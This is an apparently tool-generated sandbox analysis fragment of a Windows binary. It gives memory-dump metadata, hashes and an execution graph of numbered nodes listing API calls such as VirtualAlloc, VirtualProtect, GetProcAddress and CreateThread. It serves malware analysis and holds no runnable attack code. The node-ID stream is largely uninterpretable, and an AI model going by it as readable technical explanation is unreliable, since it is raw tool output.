                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _fread_fwprintf
                                                                                                                                                                • String ID: $%02x
                                                                                                                                                                • API String ID: 2879884958-2181446322
                                                                                                                                                                • Opcode ID: 50118e58c7abeffabf880782ed54f514b4b0dee722e774ac9a7f61b22a4c87e4
                                                                                                                                                                • Instruction ID: 026343b548f2eb364c8f2181a13bb0b86db5a3d87d5d836ca8f9546278f648ed
                                                                                                                                                                • Opcode Fuzzy Hash: 50118e58c7abeffabf880782ed54f514b4b0dee722e774ac9a7f61b22a4c87e4
                                                                                                                                                                • Instruction Fuzzy Hash: F1119170D04108EBCF24CF98C980B9D7BB0AF85348F1485BAE8059B741D734AB98DB81
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,00000001,00000000,?,?,00000100,6C90EA54,6C90EB80), ref: 6C8E0172
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,6C8DAF6E), ref: 6C8E0198
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,?,?,00000100,6C90EA54,6C90EB80), ref: 6C8E01B2
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8E01FC
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8E024C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                • Opcode ID: 96d2c9d6ac49cce3a76bd57d06a64c4b2bec9044e8081c9eda5fa53ea063a4d0
                                                                                                                                                                • Instruction ID: 79c94e9e965b0f7e5d7174c9108a1d0873e13dd8153df28abc2d4ebb631c722a
                                                                                                                                                                • Opcode Fuzzy Hash: 96d2c9d6ac49cce3a76bd57d06a64c4b2bec9044e8081c9eda5fa53ea063a4d0
                                                                                                                                                                • Instruction Fuzzy Hash: A32108B17452809FEB314BA5D904B2637F8FB47719F244C1CE85ACBA91CB70D885D710

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:4.6%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:49.5%
                                                                                                                                                                Signature Coverage:1.1%
                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                Total number of Limit Nodes:134
125826 a1e49 _free 125825->125826 125827 a1e20 RtlFreeHeap 125825->125827 125826->125811 125827->125826 125828 a1e35 125827->125828 125835 9a892 20 API calls __dosmaperr 125828->125835 125830 a1e3b GetLastError 125830->125826 125831->125808 125832->125814 125833->125822 125834->125820 125835->125830 125836 6fe4a3b0 125839 6fe4a3c0 125836->125839 125848 6fe42e70 125839->125848 125846 6fe46980 35 API calls 125847 6fe4a3b9 125846->125847 125861 6fe43190 125848->125861 125853 6fe46980 126038 6fe468b0 125853->126038 125856 6fe42d40 126055 6fe42f00 125856->126055 125859 6fe42030 33 API calls 125860 6fe42dc1 125859->125860 125860->125846 125871 6fe43c40 125861->125871 125864 6fe42030 125865 6fe420c4 125864->125865 125866 6fe4209b 125864->125866 126037 6fea58e0 33 API calls __DllMainCRTStartup@12 125865->126037 125866->125853 125872 6fe43cfa 125871->125872 125874 6fe43d06 125871->125874 125945 6fe45dd0 40 API calls 125872->125945 125880 6fe43d6c 125874->125880 125946 6fe4c000 35 API calls __DllMainCRTStartup@12 125874->125946 125877 6fe43dc0 125947 6fe42130 33 API calls __DllMainCRTStartup@12 125877->125947 125879 6fe43dda 125905 6fe4c330 125879->125905 125901 6fe74490 125880->125901 125882 6fe43f32 125911 6fe75be0 125882->125911 125884 6fe75be0 33 API calls 125885 6fe4405d 125884->125885 125922 6fe45e70 125885->125922 125886 6fe43fe4 125886->125884 125889 6fe44140 125891 6fe4c330 __DllMainCRTStartup@12 33 API calls 125889->125891 125892 6fe44183 125891->125892 125926 6fe48630 125892->125926 125900 6fe42ec5 125900->125864 125902 6fe7449d 125901->125902 125955 6fe744d0 125902->125955 125985 6fe4c440 125905->125985 125907 6fe4c394 125907->125882 125912 6fe75c14 125911->125912 125913 6fe75c3d 125912->125913 126005 6fe80380 33 API calls __DllMainCRTStartup@12 125912->126005 125913->125886 125915 6fe75c70 126007 6fea58e0 33 API calls __DllMainCRTStartup@12 125915->126007 125916 6fe75c37 125916->125913 125916->125915 126006 6fe739c0 HeapFree __DllMainCRTStartup@12 125916->126006 
125923 6fe45e93 125922->125923 125924 6fe4408e 125922->125924 126008 6fe45de0 HeapFree 125923->126008 125924->125889 125948 6fe74060 35 API calls __DllMainCRTStartup@12 125924->125948 125927 6fe441e6 125926->125927 125928 6fe48640 125926->125928 125930 6fe7d570 125927->125930 126009 6fea56f0 33 API calls __DllMainCRTStartup@12 125928->126009 125931 6fe4c760 __DllMainCRTStartup@12 3 API calls 125930->125931 125932 6fe7d5b0 125931->125932 125933 6fe7d652 125932->125933 125934 6fe7d5bb CreateThread 125932->125934 126012 6fea5470 33 API calls __DllMainCRTStartup@12 125933->126012 125936 6fe4425d 125934->125936 125937 6fe7d5ed 125934->125937 126013 6fe7d6d0 SetThreadStackGuarantee 125934->126013 125936->125900 125949 6fe46a50 125936->125949 125940 6fe7d621 125937->125940 126010 6fe4c770 HeapFree 125937->126010 126011 6fe4c770 HeapFree 125940->126011 125944 6fe7d630 GetLastError 125944->125936 125945->125874 125946->125877 125947->125880 125948->125889 126021 6fe46cb0 125949->126021 125952 6fe6a0f0 126026 6fe6a270 125952->126026 125968 6fe88070 33 API calls 2 library calls 125955->125968 125957 6fe74514 125958 6fe74531 125957->125958 125969 6fe4c760 125957->125969 125960 6fe745bf 125958->125960 125961 6fe7453c 125958->125961 125977 6fea5470 33 API calls __DllMainCRTStartup@12 125960->125977 125964 6fe744be 125961->125964 125978 6fea49d0 33 API calls __DllMainCRTStartup@12 125961->125978 125964->125879 125968->125957 125970 6fe7a0b0 125969->125970 125971 6fe7a0c2 125970->125971 125972 6fe7a0d9 125970->125972 125979 6fe7c150 125971->125979 125973 6fe7c150 __DllMainCRTStartup@12 3 API calls 125972->125973 125975 6fe7a0ec 125973->125975 125975->125958 125976 6fe7a0d3 125976->125958 125980 6fe7c162 RtlAllocateHeap 125979->125980 125981 6fe7c16d 125979->125981 125980->125976 125984 6fea4d50 GetProcessHeap HeapAlloc 125981->125984 125983 6fe7c172 125983->125976 125984->125983 125986 6fe4c512 125985->125986 125987 6fe4c4af 125985->125987 125989 6fe4c572 125986->125989 125990 
6fe4c51a 125986->125990 126002 6fe47bc0 33 API calls __DllMainCRTStartup@12 125987->126002 126004 6fe4c7b0 RtlAllocateHeap GetProcessHeap HeapAlloc __DllMainCRTStartup@12 125989->126004 126003 6fe4c3d0 33 API calls __DllMainCRTStartup@12 125990->126003 125992 6fe4c4bb 125994 6fe48630 __DllMainCRTStartup@12 33 API calls 125992->125994 125995 6fe4c376 125994->125995 125995->125907 126001 6fea5470 33 API calls __DllMainCRTStartup@12 125995->126001 125996 6fe4c56c 125996->125995 125997 6fe48630 __DllMainCRTStartup@12 33 API calls 125996->125997 125998 6fe4c60f 125997->125998 125999 6fe48630 __DllMainCRTStartup@12 33 API calls 125998->125999 126000 6fe4c6ba 125999->126000 126002->125992 126003->125996 126004->125996 126005->125916 126006->125915 126008->125924 126010->125940 126011->125944 126014 6fe7d727 126013->126014 126015 6fe7d740 126014->126015 126019 6fe4c770 HeapFree 126014->126019 126020 6fe4c770 HeapFree 126015->126020 126018 6fe7d74f 126019->126015 126020->126018 126022 6fe44355 126021->126022 126023 6fe46d08 126021->126023 126022->125952 126025 6fe47800 34 API calls 126023->126025 126025->126022 126029 6fe6a200 126026->126029 126032 6fe6ae90 126029->126032 126033 6fe6a0fd 126032->126033 126034 6fe6aee8 126032->126034 126033->125900 126036 6fe6ad50 33 API calls __DllMainCRTStartup@12 126034->126036 126036->126033 126045 6fe468a0 126038->126045 126041 6fe6a0f0 __DllMainCRTStartup@12 33 API calls 126042 6fe4690d 126041->126042 126043 6fe46a50 34 API calls 126042->126043 126044 6fe46925 126043->126044 126044->125856 126048 6fe46890 126045->126048 126051 6fe46990 126048->126051 126054 6fe47530 CloseHandle 126051->126054 126053 6fe4689d 126053->126041 126054->126053 126058 6fe44560 126055->126058 126059 6fe4461a 126058->126059 126061 6fe44626 126058->126061 126088 6fe45dd0 40 API calls 126059->126088 126067 6fe4468c 126061->126067 126089 6fe4c000 35 API calls __DllMainCRTStartup@12 126061->126089 126063 6fe74490 33 API calls 126066 6fe446fa 126063->126066 126064 
6fe446e0 126090 6fe42130 33 API calls __DllMainCRTStartup@12 126064->126090 126068 6fe4c330 __DllMainCRTStartup@12 33 API calls 126066->126068 126067->126063 126069 6fe44852 126068->126069 126070 6fe75be0 33 API calls 126069->126070 126072 6fe44904 126070->126072 126071 6fe75be0 33 API calls 126073 6fe4497d 126071->126073 126072->126071 126074 6fe45e70 HeapFree 126073->126074 126075 6fe449ae 126074->126075 126076 6fe44a60 126075->126076 126091 6fe74060 35 API calls __DllMainCRTStartup@12 126075->126091 126078 6fe4c330 __DllMainCRTStartup@12 33 API calls 126076->126078 126079 6fe44aa3 126078->126079 126080 6fe48630 __DllMainCRTStartup@12 33 API calls 126079->126080 126081 6fe44b06 126080->126081 126082 6fe7d570 36 API calls 126081->126082 126083 6fe44b7d 126082->126083 126084 6fe46a50 34 API calls 126083->126084 126087 6fe42d95 126083->126087 126085 6fe44c75 126084->126085 126086 6fe6a0f0 __DllMainCRTStartup@12 33 API calls 126085->126086 126086->126087 126087->125859 126088->126061 126089->126064 126090->126067 126091->126076 126112 6fe4b8b0 126115 6fe4a070 126112->126115 126118 6fe456e0 126115->126118 126121 6fe458d0 126118->126121 126124 6fe47f90 126121->126124 126141 6fe49ed0 126124->126141 126128 6fe4802e __DllMainCRTStartup@12 126129 6fe48081 VirtualAlloc 126128->126129 126130 6fe480b4 __DllMainCRTStartup@12 126129->126130 126145 6fe4bd40 126130->126145 126132 6fe48113 __InternalCxxFrameHandler 126151 6fe42dd0 126132->126151 126140 6fe481bd 126159 6fe411b0 126140->126159 126162 6fe74280 126140->126162 126142 6fe49f28 126141->126142 126175 6fe74c10 126142->126175 126305 6fe411e0 126145->126305 126147 6fe4bd91 126148 6fe411e0 __DllMainCRTStartup@12 33 API calls 126147->126148 126150 6fe4bdd5 126147->126150 126310 6fea56f0 33 API calls __DllMainCRTStartup@12 126147->126310 126148->126147 126150->126132 126312 6fe43040 126151->126312 126154 6fe42030 33 API calls 126155 6fe42e5a 126154->126155 126156 6fe42d10 126155->126156 126349 6fe42b60 126156->126349 126372 
6fe41000 126159->126372 126163 6fe74296 126162->126163 126164 6fe742a0 CreateWaitableTimerExW 126162->126164 126163->126164 126167 6fe74341 Sleep 126163->126167 126165 6fe742b9 126164->126165 126164->126167 126166 6fe74337 CloseHandle 126165->126166 126170 6fe742f5 SetWaitableTimer 126165->126170 126166->126167 126169 6fe7439f 126167->126169 126169->126140 126170->126166 126171 6fe7431b WaitForSingleObject CloseHandle 126170->126171 126171->126169 126172 6fe74335 126171->126172 126172->126167 126173 6fea58e0 33 API calls __DllMainCRTStartup@12 126174 6fea58e0 33 API calls __DllMainCRTStartup@12 126193 6fe7c180 126175->126193 126178 6fe47fdf 126178->126128 126178->126173 126181 6fe74d49 126183 6fe74d20 126181->126183 126213 6fe73b20 126181->126213 126192 6fe74d8d CloseHandle 126183->126192 126221 6fe76010 126183->126221 126185 6fe74cd8 126185->126183 126190 6fe74d10 126185->126190 126223 6fe4c770 HeapFree 126185->126223 126224 6fe4c770 HeapFree 126190->126224 126192->126178 126225 6fe7e260 126193->126225 126197 6fe74c96 126197->126178 126208 6fe7c3a0 GetFileInformationByHandle 126197->126208 126200 6fe7c2bd CreateFileW 126201 6fe7c2f3 126200->126201 126202 6fe7c352 GetLastError 126200->126202 126203 6fe7c220 126201->126203 126204 6fe7c304 GetLastError 126201->126204 126202->126197 126202->126203 126203->126197 126286 6fe4c770 HeapFree 126203->126286 126204->126203 126205 6fe7c315 SetFileInformationByHandle 126204->126205 126205->126203 126206 6fe7c380 GetLastError CloseHandle 126205->126206 126206->126203 126207 6fe7c397 126206->126207 126207->126197 126209 6fe7c3d5 126208->126209 126210 6fe7c46b GetLastError 126208->126210 126211 6fe74cc2 126209->126211 126212 6fe7c3e2 GetFileInformationByHandleEx 126209->126212 126210->126211 126211->126181 126211->126185 126212->126210 126212->126211 126214 6fe73b24 126213->126214 126215 6fe73b5a 126213->126215 126216 6fe73b4f 126214->126216 126217 6fe73b69 126214->126217 126218 6fe73b41 126214->126218 126215->126183 
126216->126183 126217->126216 126219 6fe4c760 __DllMainCRTStartup@12 3 API calls 126217->126219 126303 6fe4c790 5 API calls __DllMainCRTStartup@12 126218->126303 126219->126216 126304 6fe7603b 38 API calls __DllMainCRTStartup@12 126221->126304 126223->126190 126224->126183 126226 6fe7e29f 126225->126226 126227 6fe7e2cb 126225->126227 126228 6fe7e3cf 126226->126228 126229 6fe7e2ae 126226->126229 126287 6fe73ef0 33 API calls 126227->126287 126290 6fea5450 33 API calls __DllMainCRTStartup@12 126228->126290 126232 6fe4c760 __DllMainCRTStartup@12 3 API calls 126229->126232 126234 6fe7e2c0 126232->126234 126233 6fe7e3d8 126291 6fea5450 33 API calls __DllMainCRTStartup@12 126233->126291 126234->126227 126234->126233 126236 6fe7e360 126239 6fe7c19a 126236->126239 126288 6fe4c770 HeapFree 126236->126288 126239->126197 126245 6fe7e970 126239->126245 126240 6fe7e38b 126240->126239 126289 6fe73c40 35 API calls __DllMainCRTStartup@12 126240->126289 126244 6fe7e2f8 126244->126236 126244->126240 126249 6fe7e9ab 126245->126249 126246 6fe7c1cc 126246->126197 126246->126200 126246->126203 126247 6fe7eadd SetLastError GetFullPathNameW 126248 6fe7eaf6 GetLastError 126247->126248 126247->126249 126248->126249 126250 6fe7eb84 GetLastError 126248->126250 126249->126246 126249->126247 126251 6fe7eb16 GetLastError 126249->126251 126254 6fe7eb42 126249->126254 126292 6fea48c0 33 API calls __DllMainCRTStartup@12 126249->126292 126255 6fe7eba0 126250->126255 126256 6fe7eb93 126250->126256 126251->126249 126253 6fe7eeb1 126251->126253 126299 6fea56a0 33 API calls __DllMainCRTStartup@12 126253->126299 126257 6fe7eece 126254->126257 126258 6fe7eb4d 126254->126258 126255->126246 126294 6fe4c770 HeapFree 126255->126294 126293 6fe4c770 HeapFree 126256->126293 126300 6fea5970 33 API calls __DllMainCRTStartup@12 126257->126300 126262 6fe7eb60 126258->126262 126266 6fe7ec4b 126258->126266 126270 6fe7ed03 126262->126270 126279 6fe73b20 5 API calls 126262->126279 126268 6fe7ed0e __DllMainCRTStartup@12 
126266->126268 126269 6fe73b20 5 API calls 126266->126269 126276 6fe7eda6 __DllMainCRTStartup@12 126268->126276 126296 6fea48c0 33 API calls __DllMainCRTStartup@12 126268->126296 126273 6fe7ee82 126269->126273 126270->126268 126295 6fea48c0 33 API calls __DllMainCRTStartup@12 126270->126295 126273->126268 126274 6fe7eeff 126273->126274 126302 6fea5450 33 API calls __DllMainCRTStartup@12 126274->126302 126278 6fe7eded 126276->126278 126297 6fe73c40 35 API calls __DllMainCRTStartup@12 126276->126297 126278->126246 126298 6fe4c770 HeapFree 126278->126298 126280 6fe7ed22 126279->126280 126280->126270 126283 6fe7eee6 126280->126283 126301 6fea5450 33 API calls __DllMainCRTStartup@12 126283->126301 126286->126197 126287->126244 126288->126239 126289->126239 126293->126255 126294->126246 126297->126278 126298->126246 126303->126216 126306 6fe41203 126305->126306 126307 6fe411fc 126305->126307 126306->126307 126311 6fea55d0 33 API calls __DllMainCRTStartup@12 126306->126311 126307->126147 126315 6fe432d0 126312->126315 126316 6fe43393 126315->126316 126318 6fe4339f 126315->126318 126345 6fe45dd0 40 API calls 126316->126345 126323 6fe43405 126318->126323 126346 6fe4c000 35 API calls __DllMainCRTStartup@12 126318->126346 126320 6fe74490 33 API calls 126324 6fe43473 126320->126324 126321 6fe43459 126347 6fe42130 33 API calls __DllMainCRTStartup@12 126321->126347 126323->126320 126325 6fe4c330 __DllMainCRTStartup@12 33 API calls 126324->126325 126326 6fe435cb 126325->126326 126327 6fe75be0 33 API calls 126326->126327 126330 6fe43680 126327->126330 126328 6fe75be0 33 API calls 126329 6fe436f9 126328->126329 126331 6fe45e70 HeapFree 126329->126331 126330->126328 126332 6fe4372a 126331->126332 126333 6fe4380f 126332->126333 126348 6fe74060 35 API calls __DllMainCRTStartup@12 126332->126348 126335 6fe4c330 __DllMainCRTStartup@12 33 API calls 126333->126335 126336 6fe43856 126335->126336 126337 6fe48630 __DllMainCRTStartup@12 33 API calls 126336->126337 126338 6fe438bd 
126337->126338 126339 6fe7d570 36 API calls 126338->126339 126340 6fe43934 126339->126340 126341 6fe46a50 34 API calls 126340->126341 126344 6fe42e2e 126340->126344 126342 6fe43a2c 126341->126342 126343 6fe6a0f0 __DllMainCRTStartup@12 33 API calls 126342->126343 126343->126344 126344->126154 126345->126318 126346->126321 126347->126323 126348->126333 126362 6fe7d840 WaitForSingleObject 126349->126362 126351 6fe42ba9 126352 6fe42be4 126351->126352 126353 6fe42bcc 126351->126353 126354 6fe42be2 126352->126354 126355 6fe42c3c 126352->126355 126369 6fea5590 33 API calls __DllMainCRTStartup@12 126353->126369 126370 6fea5590 33 API calls __DllMainCRTStartup@12 126354->126370 126358 6fe6a0f0 __DllMainCRTStartup@12 33 API calls 126355->126358 126359 6fe42c74 126358->126359 126360 6fe46a50 34 API calls 126359->126360 126361 6fe42c8c 126360->126361 126361->126140 126361->126174 126363 6fe7d896 GetLastError 126362->126363 126364 6fe7d87e CloseHandle 126362->126364 126371 6fea55d0 33 API calls __DllMainCRTStartup@12 126363->126371 126364->126351 126373 6fe41031 126372->126373 126374 6fe41093 126372->126374 126373->126374 126376 6fea55d0 33 API calls __DllMainCRTStartup@12 126373->126376 126374->126140 126377 6fe67730 126381 6fe67990 126377->126381 126383 6fe67998 33 API calls __DllMainCRTStartup@12 126381->126383 126384 6fe9bdbf 126385 6fe9bdc8 126384->126385 126386 6fe9bdfa 126384->126386 126390 6fe9a9fb 126385->126390 126391 6fe9aa06 126390->126391 126394 6fe9aa0c 126390->126394 126438 6fe98afd 6 API calls __dosmaperr 126391->126438 126396 6fe9aa12 126394->126396 126439 6fe98b3c 126394->126439 126397 6fe9aa17 126396->126397 126447 6fe98364 41 API calls __CreateFrameInfo 126396->126447 126415 6fe9bbca 126397->126415 126398 6fe987eb __dosmaperr 14 API calls 126400 6fe9aa36 126398->126400 126402 6fe9aa3e 126400->126402 126403 6fe9aa53 126400->126403 126405 6fe98b3c __dosmaperr 6 API calls 126402->126405 126404 6fe98b3c __dosmaperr 6 API calls 126403->126404 126406 6fe9aa5f 
126404->126406 126407 6fe9aa4a 126405->126407 126408 6fe9aa63 126406->126408 126409 6fe9aa72 126406->126409 126444 6fe98848 14 API calls __dosmaperr 126407->126444 126410 6fe98b3c __dosmaperr 6 API calls 126408->126410 126445 6fe9a742 14 API calls __dosmaperr 126409->126445 126410->126407 126413 6fe9aa7d 126446 6fe98848 14 API calls __dosmaperr 126413->126446 126456 6fe9bd1f 126415->126456 126420 6fe9bc0d 126420->126386 126423 6fe9bc34 126483 6fe9be1a 126423->126483 126424 6fe9bc26 126494 6fe98848 14 API calls __dosmaperr 126424->126494 126428 6fe9bc6c 126495 6fe987d8 14 API calls __dosmaperr 126428->126495 126430 6fe9bc71 126496 6fe98848 14 API calls __dosmaperr 126430->126496 126431 6fe9bc87 126432 6fe9bcb3 126431->126432 126497 6fe98848 14 API calls __dosmaperr 126431->126497 126433 6fe9bcfc 126432->126433 126498 6fe9b843 41 API calls 2 library calls 126432->126498 126499 6fe98848 14 API calls __dosmaperr 126433->126499 126438->126394 126448 6fe9899b 126439->126448 126442 6fe98b76 TlsSetValue 126443 6fe98b61 126443->126396 126443->126398 126444->126396 126445->126413 126446->126397 126449 6fe989cb 126448->126449 126452 6fe989c7 126448->126452 126449->126452 126455 6fe988d0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary ___vcrt_FlsFree 126449->126455 126451 6fe989df 126451->126452 126453 6fe989e5 GetProcAddress 126451->126453 126452->126442 126452->126443 126453->126452 126454 6fe989f5 __dosmaperr 126453->126454 126454->126452 126455->126451 126457 6fe9bd2b __FrameHandler3::FrameUnwindToState 126456->126457 126459 6fe9bd45 126457->126459 126500 6fe9ad0c EnterCriticalSection 126457->126500 126461 6fe9bbf4 126459->126461 126503 6fe98364 41 API calls __CreateFrameInfo 126459->126503 126460 6fe9bd81 126502 6fe9bd9e LeaveCriticalSection __CreateFrameInfo 126460->126502 126467 6fe9b951 126461->126467 126464 6fe9bd55 126464->126460 126501 6fe98848 14 API calls __dosmaperr 126464->126501 126504 6fe9b417 126467->126504 126470 6fe9b972 GetOEMCP 126472 6fe9b99b 
126470->126472 126471 6fe9b984 126471->126472 126473 6fe9b989 GetACP 126471->126473 126472->126420 126474 6fe993ef 126472->126474 126473->126472 126475 6fe9942d 126474->126475 126476 6fe993fd 126474->126476 126516 6fe987d8 14 API calls __dosmaperr 126475->126516 126477 6fe99418 HeapAlloc 126476->126477 126481 6fe99401 __dosmaperr 126476->126481 126479 6fe9942b 126477->126479 126477->126481 126480 6fe99432 126479->126480 126480->126423 126480->126424 126481->126475 126481->126477 126515 6fe9c504 EnterCriticalSection LeaveCriticalSection __dosmaperr 126481->126515 126484 6fe9b951 43 API calls 126483->126484 126485 6fe9be3a 126484->126485 126487 6fe9be77 IsValidCodePage 126485->126487 126492 6fe9bf3f 126485->126492 126493 6fe9be92 __CreateFrameInfo 126485->126493 126489 6fe9be89 126487->126489 126487->126492 126488 6fe9bc61 126488->126428 126488->126431 126490 6fe9beb2 GetCPInfo 126489->126490 126489->126493 126490->126492 126490->126493 126528 6fe90c5b 126492->126528 126517 6fe9ba25 126493->126517 126494->126420 126495->126430 126496->126420 126497->126432 126498->126433 126499->126420 126500->126464 126501->126460 126502->126459 126505 6fe9b435 126504->126505 126506 6fe9b42e 126504->126506 126505->126506 126512 6fe9a940 41 API calls 3 library calls 126505->126512 126506->126470 126506->126471 126508 6fe9b456 126513 6fe9970f 41 API calls _fread 126508->126513 126510 6fe9b46c 126514 6fe9976d 41 API calls _fread 126510->126514 126512->126508 126513->126510 126514->126506 126515->126481 126516->126480 126518 6fe9ba4d GetCPInfo 126517->126518 126527 6fe9bb16 126517->126527 126524 6fe9ba65 126518->126524 126518->126527 126520 6fe90c5b _ValidateLocalCookies 5 API calls 126522 6fe9bbc8 126520->126522 126522->126492 126535 6fea089e 126524->126535 126526 6fea1243 46 API calls 126526->126527 126527->126520 126529 6fe90c63 126528->126529 126530 6fe90c64 IsProcessorFeaturePresent 126528->126530 126529->126488 126532 6fe91335 126530->126532 126606 6fe912f8 
SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 126532->126606 126534 6fe91418 126534->126488 126536 6fe9b417 41 API calls 126535->126536 126537 6fea08be 126536->126537 126555 6fe9c1bc 126537->126555 126539 6fea097a 126542 6fe90c5b _ValidateLocalCookies 5 API calls 126539->126542 126540 6fea0972 126558 6fea099f 14 API calls ___free_lconv_mon 126540->126558 126541 6fea08eb 126541->126539 126541->126540 126544 6fe993ef 15 API calls 126541->126544 126546 6fea0910 __CreateFrameInfo 126541->126546 126545 6fe9bacd 126542->126545 126544->126546 126550 6fea1243 126545->126550 126546->126540 126547 6fe9c1bc ___scrt_uninitialize_crt MultiByteToWideChar 126546->126547 126548 6fea0959 126547->126548 126548->126540 126549 6fea0960 GetStringTypeW 126548->126549 126549->126540 126551 6fe9b417 41 API calls 126550->126551 126552 6fea1256 126551->126552 126561 6fea1054 126552->126561 126559 6fe9c124 126555->126559 126558->126539 126560 6fe9c135 MultiByteToWideChar 126559->126560 126560->126541 126562 6fea106f 126561->126562 126563 6fe9c1bc ___scrt_uninitialize_crt MultiByteToWideChar 126562->126563 126564 6fea10b3 126563->126564 126566 6fea1181 126564->126566 126568 6fe993ef 15 API calls 126564->126568 126570 6fea10d9 126564->126570 126571 6fea122e 126564->126571 126565 6fe90c5b _ValidateLocalCookies 5 API calls 126567 6fe9baee 126565->126567 126601 6fea099f 14 API calls ___free_lconv_mon 126566->126601 126567->126526 126568->126570 126570->126566 126572 6fe9c1bc ___scrt_uninitialize_crt MultiByteToWideChar 126570->126572 126571->126565 126573 6fea1122 126572->126573 126573->126566 126589 6fe98bc9 126573->126589 126576 6fea1158 126576->126566 126579 6fe98bc9 7 API calls 126576->126579 126577 6fea1190 126578 6fea1219 126577->126578 126580 6fe993ef 15 API calls 126577->126580 126582 6fea11a2 126577->126582 126600 6fea099f 14 API calls ___free_lconv_mon 126578->126600 126579->126566 126580->126582 126582->126578 126583 6fe98bc9 7 API calls 
126582->126583 126584 6fea11e5 126583->126584 126584->126578 126598 6fe9c276 WideCharToMultiByte ___scrt_uninitialize_crt 126584->126598 126586 6fea11ff 126586->126578 126587 6fea1208 126586->126587 126599 6fea099f 14 API calls ___free_lconv_mon 126587->126599 126602 6fe9889c 126589->126602 126592 6fe98bda LCMapStringEx 126597 6fe98c21 126592->126597 126593 6fe98c01 126605 6fe98c26 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 126593->126605 126595 6fe98c1a LCMapStringW 126595->126597 126597->126566 126597->126576 126597->126577 126598->126586 126599->126566 126600->126566 126601->126571 126603 6fe9899b __dosmaperr 5 API calls 126602->126603 126604 6fe988b2 126603->126604 126604->126592 126604->126593 126605->126595 126606->126534 126607 6fe66970 126610 6fe669d0 126607->126610 126613 6fe66520 126610->126613 126614 6fe66560 126613->126614 126615 6fe6656d 126613->126615 126620 6fea5590 33 API calls __DllMainCRTStartup@12 126614->126620 126619 6fe67810 GetNativeSystemInfo 126615->126619 126618 6fe66572 126619->126618 126641 6fe50a00 126644 6fe4ef00 126641->126644 126645 6fe4ef63 __DllMainCRTStartup@12 126644->126645 126646 6fea4f70 __DllMainCRTStartup@12 37 API calls 126645->126646 126647 6fe4efae 126645->126647 126646->126647 126648 1000c7a7 126649 1000c7be 126648->126649 126655 1000c82c 126648->126655 126649->126655 126660 1000c7e6 GetModuleHandleA 126649->126660 126651 1000c872 126652 1000c835 GetModuleHandleA 126653 1000c83f 126652->126653 126653->126653 126653->126655 126656 1000c85f GetProcAddress 126653->126656 126655->126651 126655->126652 126655->126653 126656->126655 126661 1000c7ef 126660->126661 126667 1000c82c 126660->126667 126672 1000c803 GetProcAddress 126661->126672 126664 1000c872 126665 1000c835 GetModuleHandleA 126669 1000c83f 126665->126669 126667->126664 126667->126665 126667->126669 126669->126667 126671 1000c85f GetProcAddress 126669->126671 126671->126667 126673 1000c82c 126672->126673 126674 1000c80d VirtualProtect 
126672->126674 126676 1000c872 126673->126676 126677 1000c835 GetModuleHandleA 126673->126677 126674->126673 126675 1000c81c VirtualProtect 126674->126675 126675->126673 126679 1000c83f 126677->126679 126678 1000c85f GetProcAddress 126678->126679 126679->126673 126679->126678 126680 6fe908c3 126681 6fe908ce 126680->126681 126682 6fe90901 126680->126682 126683 6fe908f3 126681->126683 126684 6fe908d3 126681->126684 126708 6fe90a1d 147 API calls 4 library calls 126682->126708 126692 6fe90916 126683->126692 126686 6fe908e9 126684->126686 126687 6fe908d8 126684->126687 126707 6fe90f05 23 API calls 126686->126707 126690 6fe908dd 126687->126690 126706 6fe90f24 21 API calls 126687->126706 126693 6fe90922 __FrameHandler3::FrameUnwindToState 126692->126693 126709 6fe90f95 126693->126709 126695 6fe90929 __DllMainCRTStartup@12 126696 6fe90950 126695->126696 126697 6fe90a15 126695->126697 126704 6fe9098c ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 126695->126704 126717 6fe90ef7 126696->126717 126722 6fe91134 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __CreateFrameInfo 126697->126722 126700 6fe90a1c 126701 6fe9095f __RTC_Initialize 126701->126704 126720 6fe90e1b InitializeSListHead 126701->126720 126703 6fe9096d 126703->126704 126721 6fe90ecc IsProcessorFeaturePresent ___scrt_release_startup_lock 